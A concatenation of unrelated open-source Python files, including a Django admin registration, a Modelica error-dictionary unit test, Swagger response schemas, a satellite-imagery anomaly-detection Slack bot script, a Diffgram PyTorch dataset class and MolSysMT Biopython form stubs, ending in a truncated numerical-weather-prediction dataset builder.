        out_col = X_time.filter(regex=f'out_loc1').columns.to_list()
        date_col = ['month','day', 'hour']
        tcol = in_col + out_col + date_col
        p = np.zeros(X_time.shape[0])
        # Bug fix: plant 2 must use its own classifiers; this loop previously
        # read classifiers['1'] (copy-paste from the plant 1 block).
        for m in classifiers['2'][f'{time_label}_{loc_label}']:
            # NOTE(review): the trailing [0] collapses each member's
            # probability vector to one scalar -- confirm whether the [0]
            # should be dropped (same question as the plant 1 loop).
            p += (m.predict_proba( plant2_pred[tcol] )/5)[:, 1].reshape(-1,)[0]
        # Binary condensation flag at the 0.3 probability threshold.
        p_cond = np.where(p>0.3, 1, 0)
        test2_pred[f'{loc_label}_{time_label}'] = p_cond
# #save env data
# Prediction.objects.bulk_create(
# Prediction(**vals) for vals in plant1_pred_25.to_dict('records')
# )
| StarcoderdataPython |
11268867 | <filename>okcupid/admin.py
# Register your models here.
from django.contrib import admin
from okcupid.models import UserProfile, Gender, Question, Opinion, SentQuestion
# Expose every okcupid model through the Django admin.
for model in (UserProfile, Gender, Question, Opinion, SentQuestion):
    admin.site.register(model)
| StarcoderdataPython |
11364003 | <filename>developer_tools/dymola_python_testing/ModelicaPy/buildingspy/tests/test_development_error_dictionary.py
#Licensed under Apache 2.0 License.
#© 2020 Battelle Energy Alliance, LLC
#ALL RIGHTS RESERVED
#.
#Prepared by Battelle Energy Alliance, LLC
#Under Contract No. DE-AC07-05ID14517
#With the U. S. Department of Energy
#.
#NOTICE: This computer software was prepared by Battelle Energy
#Alliance, LLC, hereinafter the Contractor, under Contract
#No. AC07-05ID14517 with the United States (U. S.) Department of
#Energy (DOE). The Government is granted for itself and others acting on
#its behalf a nonexclusive, paid-up, irrevocable worldwide license in this
#data to reproduce, prepare derivative works, and perform publicly and
#display publicly, by or on behalf of the Government. There is provision for
#the possible extension of the term of this license. Subsequent to that
#period or any extension granted, the Government is granted for itself and
#others acting on its behalf a nonexclusive, paid-up, irrevocable worldwide
#license in this data to reproduce, prepare derivative works, distribute
#copies to the public, perform publicly and display publicly, and to permit
#others to do so. The specific term of the license can be identified by
#inquiry made to Contractor or DOE. NEITHER THE UNITED STATES NOR THE UNITED
#STATES DEPARTMENT OF ENERGY, NOR CONTRACTOR MAKES ANY WARRANTY, EXPRESS OR
#IMPLIED, OR ASSUMES ANY LIABILITY OR RESPONSIBILITY FOR THE USE, ACCURACY,
#COMPLETENESS, OR USEFULNESS OR ANY INFORMATION, APPARATUS, PRODUCT, OR
#PROCESS DISCLOSED, OR REPRESENTS THAT ITS USE WOULD NOT INFRINGE PRIVATELY
#OWNED RIGHTS.
#!/usr/bin/env python
import unittest
class Test_development_error_dictionary(unittest.TestCase):
    """Unit tests for
    :mod:`buildingspy.development.error_dictionary.ErrorDictionary`.
    """

    def test_keys(self):
        """Verify that the dictionary exposes exactly the expected error keys."""
        import buildingspy.development.error_dictionary as e

        dictionary = e.ErrorDictionary()
        actual = sorted(dictionary.keys())
        expected = sorted(['differentiated if',
                           'experiment annotation',
                           'file not found',
                           'invalid connect',
                           'numerical Jacobians',
                           'parameter with start value only',
                           'redeclare non-replaceable',
                           'redundant consistent initial conditions',
                           'type incompatibility',
                           'type inconsistent definition equations',
                           'unspecified initial conditions',
                           'unused connector',
                           'stateGraphRoot missing'])
        self.assertEqual(len(actual), len(expected), "Wrong number of keys.")
        # Both lists are sorted, so a pairwise comparison is well defined.
        for got, want in zip(actual, expected):
            self.assertEqual(got, want, "Wrong key, expected \"{}\".".format(want))

    def test_tool_messages(self):
        """Verify the tool messages associated with the error dictionary."""
        import buildingspy.development.error_dictionary as e

        dictionary = e.ErrorDictionary()
        actual = sorted(dictionary.tool_messages())
        expected = sorted(['Differentiating (if',
                           'Warning: Failed to interpret experiment annotation',
                           'which was not found',
                           'The model contained invalid connect statements.',
                           'Number of numerical Jacobians:',
                           "Warning: The following parameters don't have any value, only a start value",
                           'Warning: Redeclaration of non-replaceable requires type equivalence',
                           'Redundant consistent initial conditions:',
                           'but they must be compatible',
                           'Type inconsistent definition equation',
                           'Dymola has selected default initial condition',
                           'Warning: The following connector variables are not used in the model',
                           "A \\\"stateGraphRoot\\\" component was automatically introduced."])
        self.assertEqual(len(actual), len(expected), "Wrong number of tool messages.")
        for got, want in zip(actual, expected):
            self.assertEqual(got, want, "Wrong tool message, expected \"{}\".".format(want))
# Run the test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
81895 | <filename>actinia_metadata_plugin/model/responseModels.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018-2021 mundialis GmbH & Co. KG
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Common api methods
"""
__author__ = "<NAME>"
__copyright__ = "2018-2021 mundialis GmbH & Co. KG"
__license__ = "Apache-2.0"
from flask_restful_swagger_2 import Schema
class SimpleStatusCodeResponseModel(Schema):
    """Simple response schema to inform about status.

    Swagger model with two fields: a numeric HTTP-like status code and a
    short human-readable message; both are required.
    """
    type = 'object'
    properties = {
        'status': {
            'type': 'number',
            'description': 'The status code of the request.'
        },
        'message': {
            'type': 'string',
            'description': 'A short message to describes the status'
        }
    }
    required = ["status", "message"]
# Canonical example attached to the model so it is rendered in the API docs.
simpleResponseExample = SimpleStatusCodeResponseModel(
    status=200, message="success")
SimpleStatusCodeResponseModel.example = simpleResponseExample
class FileUploadResponseModel(Schema):
    """Response schema for a metadata file upload.

    Reports the request status and message, the name given to the uploaded
    file, and (when one is created) the name of the metadata record.
    """
    type = 'object'
    properties = {
        'status': {
            # BUG FIX: 'int' is not a valid OpenAPI/JSON-Schema primitive
            # type name; the correct spelling is 'integer' (the sibling
            # models here use valid names such as 'number' and 'string').
            'type': 'integer',
            'description': 'The status code of the request.'
        },
        'message': {
            'type': 'string',
            'description': 'A short message to describes the status'
        },
        'name': {
            'type': 'string',
            'description': 'Name of the uploaded file'
        },
        'record': {
            'type': 'string',
            'description': 'Name of the metadata record'
        }
    }
    # 'record' is optional: it is empty when no metadata record was created.
    required = ["status", "message", "name"]
# Canonical example attached to the model so it is rendered in the API docs.
fileUploadResponseExample = FileUploadResponseModel(
    status=200,
    message="success",
    name="dd52427d-e703-44d9-a526-05b892e6a935.json",
    record=""
)
FileUploadResponseModel.example = fileUploadResponseExample
class GeodataResponseModel(Schema):
    """Model for object for geodata
    This object contains the metadata from GNOS
    """
    type = 'object'
    properties = {
        'uuid': {
            'type': 'string',
            'description': 'The Geonetwork uuid.'
        },
        'bbox': {
            # Exactly four numbers; ordering follows the example below
            # (NOTE(review): looks like [N, W, S, E] — confirm against GNOS).
            'type': 'array',
            'items': {
                'type': 'number'
            },
            'minItems': 4,
            'maxItems': 4,
            'description': 'The bounding box of the result.'
        },
        'crs': {
            'type': 'string',
            'description': 'The coordinate reference system of the result.'
        },
        'table': {
            'type': 'string',
            'description': ('The db connection string of the result source.')
        }
    }
    # Only the identifier and the bounding box are mandatory.
    required = ["uuid", "bbox"]
# Canonical example attached to the model so it is rendered in the API docs.
geodataResponseExample = GeodataResponseModel(
    uuid="da165110-88fd-11da-a88f-000d939bc5d8",
    bbox=[51.1, -34.6, -17.3, 38.2],
    crs="urn:ogc:def:crs:::WGS 1984",
    table="http://www.fao.org/ag/AGL/aglw/aquastat/watresafrica/index.stm"
)
GeodataResponseModel.example = geodataResponseExample
| StarcoderdataPython |
11356865 | from output.models.nist_data.list_pkg.g_month_day.schema_instance.nistschema_sv_iv_list_g_month_day_pattern_3_xsd.nistschema_sv_iv_list_g_month_day_pattern_3 import NistschemaSvIvListGMonthDayPattern3
# Public re-export surface of this generated module.
__all__ = [
    "NistschemaSvIvListGMonthDayPattern3",
]
| StarcoderdataPython |
11320372 | <reponame>nasa-gibs/gibs-validation-slackbot
# Copyright 2018 California Institute of Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys
import pickle
import subprocess
import datetime
from datetime import datetime, time, date, timedelta
from features import *
from gibs_layer import GIBSLayer
import models.net as net
import utils
import numpy as np
from PIL import Image
import cv2
import torch
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
import torchvision.transforms as transforms
from torch.autograd import Variable
from sklearn.ensemble import RandomForestClassifier
# GIBS VIIRS Layer Definitions
VIIRS_SNPP_CorrectedReflectance_TrueColor = GIBSLayer.get_gibs_layer('VIIRS_SNPP_CorrectedReflectance_TrueColor')
VIIRS_SNPP_CorrectedReflectance_BandsM3_I3_M11 = GIBSLayer.get_gibs_layer('VIIRS_SNPP_CorrectedReflectance_BandsM3-I3-M11')
VIIRS_SNPP_CorrectedReflectance_BandsM11_I2_I1 = GIBSLayer.get_gibs_layer('VIIRS_SNPP_CorrectedReflectance_BandsM11-I2-I1')
viirs_layers = [VIIRS_SNPP_CorrectedReflectance_TrueColor, VIIRS_SNPP_CorrectedReflectance_BandsM3_I3_M11, VIIRS_SNPP_CorrectedReflectance_BandsM11_I2_I1]
# Working image size (width, height) and root directory of downloaded imagery.
img_size = (2048, 1024)
data_dir = 'data/4326/'
###############################################################################
# Parse Arguments from Slack Bot
###############################################################################
# TODO: Add Error Checking
# argv[1] is a "YYYY-MM-DD" date string; argv[2] optionally names one layer.
datestring = sys.argv[1]
layer_name = sys.argv[2] if len(sys.argv) > 2 else ""
if layer_name in [layer.layer_name for layer in viirs_layers]:
    # A known layer was requested explicitly: restrict processing to it.
    viirs_layers = [GIBSLayer.get_gibs_layer(layer_name)]
# print(datestring)
# end_date is one day after start_date (download range is a single day).
start_date = datestring
end_date = datetime.strptime(start_date, "%Y-%m-%d") + timedelta(1)
end_date = datetime.strftime(end_date, "%Y-%m-%d")
# NOTE(review): this loop only rebinds layer_name/img_extension/filename; the
# code below the loop uses the values from the FINAL iteration — confirm that
# processing a single layer per run is the intended behavior.
for layer in viirs_layers:
    layer_name = layer.layer_name
    img_extension = layer.format_suffix
    # Construct and resize the image
    filename = os.path.join(data_dir, datestring, layer_name + "." + img_extension)
###############################################################################
# Download Image from Date
###############################################################################
def run_command(cmd):
    """
    Runs the provided command as a subprocess and raises on any error output.

    Arguments:
        cmd: the command to be executed, as a list of argument strings.

    Raises:
        Exception: if the process writes a line containing "ERROR" to stdout,
            or writes anything at all to stderr.
    """
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    process.wait()
    for output in process.stdout:
        if b"ERROR" in output:
            # BUG FIX: the original raised Exception(error.strip()) here, but
            # `error` is undefined in this loop (NameError at runtime);
            # report the offending stdout line instead.
            raise Exception(output.strip())
    for error in process.stderr:
        raise Exception(error.strip())
# Download the image if it does not exist
if not os.path.isfile(filename):
    # Build up the command!
    cmd_list = ["python", "download_data.py", "--layer_name", layer_name,"--start_date", start_date, "--end_date", end_date]
    # NOTE(review): `cmd` is only built for the commented-out debug print
    # below; run_command receives the list form.
    cmd = ' '.join(cmd_list)
    # print(cmd)
    # Run the command as a terminal subprocess
    try:
        run_command(cmd_list)
    except Exception as e:
        # Best-effort: report the failure and continue with whatever exists.
        print(e)
###############################################################################
# Miscoloration RF Classifier Stage
###############################################################################
# load image from Disk
test_image = np.asarray((Image.open(filename).resize(img_size, Image.BILINEAR)))
# expand single image to a one-element batch
X_test = np.expand_dims(test_image, axis=0) # => (N x H x W x C)
# featurize image with an HSV color histogram
num_color_bins = 360 # Number of bins in the color histogram
feature_fns = [lambda img: color_histogram_hsv(img, nbin=num_color_bins)] #, hog_feature]
X_test_feats = extract_features(X_test, feature_fns, verbose=False)
# preprocess: subtract the per-layer mean features saved at training time
mean_feats = np.load('models/random_forests/' + layer_name + '.npy')
X_test_feats -= mean_feats
# open the saved classifier file (per-layer random forest)
classifier_path = 'models/random_forests/' + layer_name + '.cpickle'
with open(classifier_path, 'rb') as f:
    clf = pickle.load(f)
# evaluate model on the image
miscolor_test_prob = clf.predict_proba(X_test_feats)
miscolor_test_pred = clf.predict(X_test_feats)
# remove the batch index for the single image
miscolor_test_prob = miscolor_test_prob[0]
miscolor_test_pred = miscolor_test_pred[0]
###############################################################################
# Missing Data CNN Classifier Stage
###############################################################################
# Directory containing params.json
model_dir = 'models/cnn'
json_path = os.path.join(model_dir, 'params.json')
assert os.path.isfile(json_path), "No json configuration file found at {}".format(json_path)
params = utils.Params(json_path)
# use GPU if available
params.cuda = torch.cuda.is_available()
# print("GPU available: {}".format(params.cuda))
# set the random seed for reproducible experiments
torch.manual_seed(230)
if params.cuda: torch.cuda.manual_seed(230)
# define the model (binary classifier: normal vs. anomaly)
num_classes = 2
model = net.Net(params, num_classes=num_classes).cuda() if params.cuda else net.Net(params, num_classes=num_classes)
# reload weights from the saved per-layer checkpoint file
map_location = None if params.cuda else 'cpu'
saved_weights_filename = os.path.join(model_dir, layer_name + '.pth.tar')
utils.load_checkpoint(saved_weights_filename, model, map_location=map_location)
# set the model input size
IMG_DIM = (128, 256)
IMG_PADDING = (0, 64, 0, 64) # left, top, right, bottom borders
# loader for evaluation, no data augmentation (e.g. horizontal flip)
eval_transformer = transforms.Compose([
    transforms.Resize(IMG_DIM), # resize the image
    transforms.Pad(padding=IMG_PADDING, fill=0), # pad to be square!
    transforms.Grayscale(),
    transforms.ToTensor(), # transform it into a torch tensor
])
def image_loader(image_filename):
    """Load an image from disk and return it as a (1, C, H, W) torch Variable.

    The image is binarized (any non-zero grayscale pixel becomes 255), passed
    through the module-level ``eval_transformer`` pipeline, optionally moved
    to the GPU, and given a leading batch dimension.
    """
    image = np.asarray(Image.open(image_filename))
    # binarize image
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    _, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY)
    image = Image.fromarray(image)
    # perform eval transforms
    image = eval_transformer(image).float()
    # move to GPU if available
    if params.cuda:
        # BUG FIX: `async` became a reserved keyword in Python 3.7, so
        # `image.cuda(async=True)` is a SyntaxError; PyTorch renamed the
        # argument to `non_blocking` in 0.4.
        image = image.cuda(non_blocking=True)
    # convert to Variable
    image = Variable(image, requires_grad=True)
    image = image.unsqueeze(0) # add batch dimension!
    return image
# load the image
image = image_loader(filename)
# set model to evaluation mode
model.eval()
output = model(image)
# evaluate model on the image
missing_test_prob = np.exp(output.data.cpu().numpy()) # exponentiate the log-probabilities
missing_test_pred = np.argmax(missing_test_prob, axis=1)
# remove the batch index for the single image
missing_test_prob = missing_test_prob[0]
missing_test_pred = missing_test_pred[0]
###############################################################################
# Report Anomaly Found or Not!
###############################################################################
# Class indices used by both classifiers: 0 = normal, 1 = anomaly.
NORMAL, ANOMALY = 0, 1
print("{}".format(layer_name))
if missing_test_pred == ANOMALY:
    print('- *ANOMALY (MISSING DATA)* detected with *{}%* confidence'.format(int(100*missing_test_prob[ANOMALY])))
else:
    print('- *NORMAL (MISSING DATA)* predicted with *{}%* confidence'.format(int(100*missing_test_prob[NORMAL])))
if miscolor_test_pred == ANOMALY:
    print('- *ANOMALY (MISCOLOR)* detected with *{}%* confidence'.format(int(100*miscolor_test_prob[ANOMALY])))
else:
    print('- *NORMAL (MISCOLOR)* predicted with *{}%* confidence'.format(int(100*miscolor_test_prob[NORMAL])))
###############################################################################
# Send Report Back to Slack Bot
###############################################################################
# Build a WMS GetMap URL for the layer/date by filling the ${...} templates.
image_url = 'https://gibs.earthdata.nasa.gov/wms/epsg4326/all/wms.cgi?SERVICE=WMS&VERSION=1.3.0&REQUEST=GetMap&LAYERS=${LAYER}&WIDTH=1024&HEIGHT=512&BBOX=-90,-180,90,180&CRS=epsg:4326&FORMAT=image/${FORMAT}&TIME=${DATE}'
image_url = image_url.replace("${DATE}", datestring)
image_url = image_url.replace("${FORMAT}", "png")
image_url = image_url.replace("${LAYER}", layer_name)
print(image_url)
# Flush output so the Slack bot reading our stdout sees the report promptly.
sys.stdout.flush()
| StarcoderdataPython |
3279116 | import json
import requests
# Output directories for images and their segmentation masks.
img_path = 'train/image/'
mask_path = 'train/label/'
# Labelbox export file: a JSON list of labeled items.
with open('export.json', 'r') as js:
    dataset = json.load(js)
# Download every non-skipped item: the source image and its mask.
for count, data in enumerate(dataset):
    if data['Label'] != 'Skip':
        img_url = data['Labeled Data']
        mask_url = data['Label']['segmentationMaskURL']
        # `with` guarantees the file handle is closed even when the HTTP
        # request or the write raises (the original leaked handles on error).
        with open(img_path + str(count) + '.jpg', 'wb') as img:
            ufr = requests.get(img_url)
            img.write(ufr.content)
        with open(mask_path + str(count) + '.png', 'wb') as mask:
            ufr = requests.get(mask_url)
            mask.write(ufr.content)
| StarcoderdataPython |
3273429 | from torch.utils.data import Dataset, DataLoader
from diffgram.core.diffgram_dataset_iterator import DiffgramDatasetIterator
try:
import torch as torch # type: ignore
except ModuleNotFoundError:
raise ModuleNotFoundError(
"'torch' module should be installed to convert the Dataset into torch (pytorch) format"
)
class DiffgramPytorchDataset(DiffgramDatasetIterator, Dataset):
    """Pytorch ``Dataset`` backed by a list of Diffgram file IDs."""

    def __init__(self, project, diffgram_file_id_list = None, transform = None, validate_ids = True):
        """
        :param project (sdk.core.core.Project): A Project object from the Diffgram SDK
        :param diffgram_file_list (list): An arbitrary number of file ID's from Diffgram.
        :param transform (callable, optional): Optional transforms to be applied on a sample
        """
        super(DiffgramPytorchDataset, self).__init__(project, diffgram_file_id_list, validate_ids)
        self.diffgram_file_id_list = diffgram_file_id_list
        self.project = project
        self.transform = transform

    def __len__(self):
        """Number of Diffgram files backing this dataset."""
        return len(self.diffgram_file_id_list)

    def __get_next_page_of_data(self):
        raise NotImplementedError

    def __getitem__(self, idx):
        """Fetch one sample, tensor-ify its bbox lists, apply the transform."""
        if torch.is_tensor(idx):
            idx = idx.tolist()
        sample = super().__getitem__(idx)
        # Convert any bounding-box coordinate lists to torch tensors.
        for key in ('x_min_list', 'x_max_list', 'y_min_list', 'y_max_list'):
            if key in sample:
                sample[key] = torch.Tensor(sample[key])
        if self.transform:
            sample = self.transform(sample)
        return sample
| StarcoderdataPython |
3269838 | from molsysmt._private_tools.exceptions import *
from molsysmt.forms.common_gets import *
from molsysmt import puw
from molsysmt.native.molecular_system import molecular_system_components
import numpy as np
# MolSysMT form descriptor for Biopython Seq objects.
form_name='biopython.Seq'
# Map from fully-qualified class name to the MolSysMT form name.
is_form={
    'Bio.Seq.Seq' : form_name
    }
info=["",""]
# Component availability flags for this form: only 'elements' is provided.
has = molecular_system_components.copy()
for ii in ['elements']:
    has[ii]=True
def to_biopython_Seq(item, molecular_system=None, atom_indices='all', frame_indices='all',
                     copy_if_all=True):
    """Return the item as a biopython.Seq, optionally restricted to a selection.

    When the full selection is requested, the item is copied only if
    ``copy_if_all`` is True; otherwise the original object is returned.
    Returns a (item, molecular_system) pair; the molecular system is None
    when none was provided.
    """
    tmp_molecular_system = None
    # BUG FIX: the original used identity comparison (`is 'all'`), which
    # relies on CPython string interning and raises a SyntaxWarning on
    # Python >= 3.8; equality is the correct test.
    if (atom_indices == 'all') and (frame_indices == 'all'):
        if copy_if_all:
            tmp_item = extract(item)
            if molecular_system is not None:
                tmp_molecular_system = molecular_system.combine_with_items(tmp_item)
        else:
            tmp_item = item
            if molecular_system is not None:
                tmp_molecular_system = molecular_system
    else:
        tmp_item = extract(item, atom_indices=atom_indices, frame_indices=frame_indices)
        if molecular_system is not None:
            tmp_molecular_system = molecular_system.combine_with_items(tmp_item, atom_indices=atom_indices, frame_indices=frame_indices)
    return tmp_item, tmp_molecular_system
def to_biopython_SeqRecord(item, molecular_system=None, atom_indices='all', frame_indices='all',
        id=None, name=None, description=None):
    # Wrap the item as a Bio.SeqRecord with the given id/name/description
    # (each defaults to the literal string 'None' when not provided).
    # NOTE(review): atom_indices/frame_indices are accepted but 'all' is
    # hard-coded in the to_biopython_Seq call below — confirm intended.
    # NOTE(review): extract_biopython_SeqRecord is imported but never used.
    from Bio.SeqRecord import SeqRecord as Bio_SeqRecord
    from .api_biopython_SeqRecord import extract as extract_biopython_SeqRecord
    if id is None:
        id = 'None'
    if name is None:
        name = 'None'
    if description is None:
        description = 'None'
    tmp_item, tmp_molecular_system = to_biopython_Seq(item, molecular_system=molecular_system, atom_indices='all', frame_indices='all', copy_if_all=False)
    tmp_item=Bio_SeqRecord(tmp_item, id=id, name=name, description=description)
    if tmp_molecular_system is not None:
        tmp_molecular_system = tmp_molecular_system.combine_with_items(tmp_item)
    return tmp_item, tmp_molecular_system
def to_file_fasta(item, molecular_system=None, atom_indices='all', frame_indices='all', output_filename=None):
    # Convert the item to a SeqRecord, then delegate FASTA writing to the
    # SeqRecord form's writer.
    # NOTE(review): the second call passes the ORIGINAL molecular_system
    # rather than tmp_molecular_system from the first conversion — confirm.
    from .api_biopython_SeqRecord import to_file_fasta as biopython_SeqRecord_to_file_fasta
    tmp_item, tmp_molecular_system = to_biopython_SeqRecord(item, molecular_system=molecular_system, atom_indices=atom_indices, frame_indices=frame_indices)
    tmp_item, tmp_molecular_system = biopython_SeqRecord_to_file_fasta(tmp_item, molecular_system=molecular_system, output_filename=output_filename)
    return tmp_item, tmp_molecular_system
def extract(item, atom_indices='all', frame_indices='all'):
    """Return a copy of the sequence item.

    Only the full selection ('all', 'all') is supported for this form; any
    other selection raises NotImplementedError.
    """
    # BUG FIX: identity comparison `is 'all'` relies on CPython string
    # interning (and is a SyntaxWarning on Python >= 3.8); use equality so
    # any string equal to 'all' is accepted.
    if (atom_indices == 'all') and (frame_indices == 'all'):
        tmp_item = item.copy()
    else:
        raise NotImplementedError
    return tmp_item
# The editing operations below are part of the common form API but are not
# implemented for the biopython.Seq form yet.
def merge(item_1, item_2):
    raise NotImplementedError
def add(to_item, item):
    raise NotImplementedError
def append_frames(item, step=None, time=None, coordinates=None, box=None):
    raise NotImplementedError
def concatenate_frames(item, step=None, time=None, coordinates=None, box=None):
    raise NotImplementedError
###### Get
# A plain sequence carries no structural/topological detail, so most of the
# getters required by the common form API are placeholders below.
## atom
def get_atom_id_from_atom(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_atom_name_from_atom(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_atom_type_from_atom(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_group_index_from_atom (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_component_index_from_atom (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_chain_index_from_atom (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_molecule_index_from_atom (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_entity_index_from_atom (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_inner_bonded_atoms_from_atom (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_n_inner_bonds_from_atom (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_coordinates_from_atom(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_frame_from_atom(item, indices='all', frame_indices='all'):
    raise NotImplementedError
## group
def get_group_id_from_group(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_group_name_from_group(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_group_type_from_group(item, indices='all', frame_indices='all'):
    raise NotImplementedError
## component
def get_component_id_from_component (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_component_name_from_component (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_component_type_from_component (item, indices='all', frame_indices='all'):
    raise NotImplementedError
## molecule
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
    raise NotImplementedError
## chain
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
    raise NotImplementedError
## entity
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
    raise NotImplementedError
## system
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
    # An atom count is undefined for a bare sequence, hence None.
    return None
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
    # The group count is taken as the length of the sequence item.
    return len(item)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_coordinates_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_box_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_box_volume_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_time_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_step_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
    raise NotImplementedError
## bond
def get_bond_order_from_bond(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_bond_type_from_bond(item, indices='all', frame_indices='all'):
    raise NotImplementedError
def get_atom_index_from_bond(item, indices='all', frame_indices='all'):
    raise NotImplementedError
###### Set
def set_box_to_system(item, indices='all', frame_indices='all', value=None):
    raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
    raise NotImplementedError
| StarcoderdataPython |
9788496 | <filename>Fuzzy_clustering/version3/DatasetManager/create_datasets_PCA.py
import numpy as np
import pandas as pd
import joblib, os, logging
from joblib import Parallel, delayed
from scipy.interpolate import interp2d
from sklearn.decomposition import KernelPCA
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import GridSearchCV
from pytz import timezone
def my_scorer(estimator, X, y=None):
    """Negative reconstruction MSE, used as a GridSearchCV scorer for KernelPCA."""
    reduced = estimator.transform(X)
    reconstructed = estimator.inverse_transform(reduced)
    # sklearn scorers maximize, so the reconstruction error is negated.
    return -mean_squared_error(X, reconstructed)
def rescale(arr, nrows, ncol):
    """Bilinearly resample a 2-D array to (nrows, ncol) on a unit grid."""
    # NOTE(review): scipy.interpolate.interp2d is deprecated (removed in
    # SciPy >= 1.14); migrate to RegularGridInterpolator when upgrading.
    W, H = arr.shape
    new_W, new_H = (nrows, ncol)
    # Both source and target grids are normalized to [0, 1] in each axis.
    xrange = lambda x: np.linspace(0, 1, x)
    f = interp2d(xrange(H), xrange(W), arr, kind="linear")
    new_arr = f(xrange(new_H), xrange(new_W))
    return new_arr
def rescale_mean(arr):
    """Downsample a 2-D array by a factor of two, averaging 2x2 blocks.

    Trailing odd rows/columns are averaged over the truncated (1-wide)
    block, so an (H, W) input yields a (ceil(H/2), ceil(W/2)) output.
    """
    n_rows = (arr.shape[0] + 1) // 2
    n_cols = (arr.shape[1] + 1) // 2
    reduced = np.zeros([n_rows, n_cols])
    for row in range(n_rows):
        for col in range(n_cols):
            reduced[row, col] = np.mean(arr[2 * row:2 * row + 2, 2 * col:2 * col + 2])
    return reduced
def stack_2d(X, sample, compress):
    """Append a 2-, 3- or 4-D sample onto accumulator X along a new leading axis.

    X starts life as an empty array; the first sample becomes X itself, the
    second call creates the leading (sample) axis via np.stack, and later
    calls append along that axis. When ``compress`` is set, the sample is
    first downsampled with rescale_mean. Samples of any other rank leave X
    unchanged.
    """
    if compress:
        sample = rescale_mean(sample)
    if sample.ndim in (2, 3, 4):
        if X.shape[0] == 0:
            # First sample: the accumulator is the sample itself.
            X = sample
        elif X.ndim == sample.ndim:
            # Second sample: introduce the new leading axis.
            X = np.stack((X, sample))
        else:
            # Subsequent samples: append along the existing leading axis.
            X = np.vstack((X, sample[np.newaxis]))
    return X
def stack_3d(X, sample):
    """Append ``sample`` to accumulator X along the leading axis.

    An empty accumulator is replaced by the sample itself; a sample with one
    fewer dimension than X gains a leading axis before being stacked.
    """
    if X.shape[0] == 0:
        return sample
    if sample.ndim != X.ndim:
        sample = sample[np.newaxis]
    return np.vstack((X, sample))
def check_empty_nwp(nwp, nwp_next, nwp_prev, variables):
    """Return False if any variable is empty in all three NWP snapshots.

    A variable counts as missing only when its array is empty in the current,
    next AND previous snapshots simultaneously.
    """
    for var in variables:
        if nwp[var].shape[0] == 0 and nwp_next[var].shape[0] == 0 and nwp_prev[var].shape[0] == 0:
            return False
    return True
def stack_daily_nwps(t, pdates, path_nwp_project, nwp_model, areas, variables, compress, model_type):
    """Load one day's NWP pickle and stack per-variable 2-D fields for pdates.

    Returns (data_var, X_3d, datestamp) where data_var maps each variable
